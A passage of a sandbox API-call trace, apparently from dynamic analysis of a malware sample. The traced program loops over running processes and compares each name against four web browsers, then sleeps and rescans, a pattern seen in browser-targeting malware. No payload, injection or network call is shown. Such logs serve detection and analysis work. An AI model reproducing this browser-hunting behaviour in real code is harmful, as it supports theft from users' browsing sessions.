lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.493] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.493] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.493] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.493] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.493] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.493] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.494] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.494] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.494] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0231.494] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0231.494] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0231.494] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.494] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.495] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0231.495] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0231.495] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0231.495] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.495] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.495] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0231.495] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0231.495] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0231.495] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.495] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.496] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.496] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.496] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.496] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.496] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.496] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0231.496] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0231.496] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0231.496] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.496] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0231.497] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0231.497] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0231.497] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0231.497] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.497] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0231.498] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0231.498] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0231.498] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0231.498] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.498] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0231.498] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0231.498] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0231.498] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0231.498] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.498] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0231.499] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0231.499] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0231.499] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0231.499] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.499] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0231.499] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0231.499] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0231.499] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0231.499] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.499] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0231.500] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0231.500] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0231.500] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0231.500] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.500] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0231.500] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0231.500] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0231.500] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0231.500] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.500] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0231.501] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0231.501] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0231.501] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0231.501] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.501] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0231.501] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0231.501] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0231.501] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0231.502] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.502] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0231.502] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0231.502] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0231.502] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0231.502] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.502] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0231.503] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0231.503] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0231.503] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0231.503] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.503] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0231.503] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0231.503] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0231.503] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0231.503] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.503] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0231.504] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0231.504] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0231.504] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0231.504] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.504] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0231.504] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0231.504] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0231.504] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0231.504] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.504] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0231.505] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0231.505] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0231.505] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0231.505] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0231.505] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0231.505] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0231.506] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0231.506] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0231.506] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0231.506] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0231.506] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0231.506] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0231.507] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0231.507] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0231.507] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0231.507] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0231.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0231.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0231.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0231.507] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0231.508] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0231.508] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0231.508] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0231.508] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0231.508] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0231.508] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0231.508] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0231.508] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.509] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0231.509] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0231.509] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0231.509] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.509] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.510] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.510] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.510] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0231.510] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0231.510] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0231.510] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0231.510] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.510] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.511] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0231.511] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0231.511] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0231.511] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0231.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0231.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0231.511] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.511] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.512] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.512] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.512] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.512] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.512] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.513] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0231.513] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0231.513] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0231.513] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0231.513] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0231.513] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0231.513] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0231.513] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0231.513] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.514] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.514] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0231.515] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0231.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0231.516] CloseHandle (hObject=0xd4) returned 1 [0231.516] Sleep (dwMilliseconds=0x3e8) [0232.527] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0232.528] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, 